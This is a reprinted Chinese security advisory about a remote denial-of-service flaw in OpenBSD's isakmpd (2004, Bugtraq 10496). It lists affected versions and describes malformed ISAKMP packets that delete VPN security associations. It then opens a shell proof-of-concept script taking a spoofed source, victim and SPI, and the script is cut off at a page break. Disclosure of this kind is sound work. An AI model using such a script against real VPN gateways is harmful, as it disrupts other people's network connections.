当前位置：首页 » 服务器技术

开发技术指南» 文章正文

    引言： 信息提供： 安全公告（或线索）提供热线：51c

 

 

OpenBSD ISAKMPD SA Piggyback删除负载远程拒绝服务漏洞

【程序编程相关:IBM DB2 generate_dis】

【推荐阅读:Sun Solaris Printd任意】

信息提供: 【扩展信息:Solaris in.rwhod远程任意】

安全公告（或线索）提供热线:51cto.editor@gmail.com

漏洞类别:

远程拒绝服务漏洞

攻击类型:

远程攻击

发布日期:

2004-06-08

更新日期:

2004-06-15

受影响系统:

openbsd openbsd 3.5

openbsd openbsd 3.4

openbsd openbsd 3.3

openbsd openbsd 3.2

openbsd openbsd 3.1

openbsd openbsd 3.0

安全系统:

无

漏洞报告人:

thomas walpuski

漏洞描述:

bugtraq  id: 10496

openbsd是一款开放源代码操作系统.isakmpd是一款ike守护程序实现.

openbsds isakmpd实现存在问题,远程攻击者可以利用这个漏洞发送畸形udp isakmp包进行拒绝服务攻击.

如果攻击者发送的畸形udp isakmp包给受此漏洞影响的服务器,并且包含的负载包括:设置新的通道与删除通道数据,isakmpd就会不正确的删除负载与终止关联,从ipsec vpn上删除sa与策略,造成终止网关间的vpn连接等拒绝服务.

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负！

#!/bin/sh

if [ ! $# -eq 3 ]; then

echo "usage: $0 <faked-src> <victim> <spi>";

exit;

fi

src=$1; dst=$2

spi=`echo $3 | sed s/\(..\)/\\\\x\1/g`

cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \

...   下一页

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：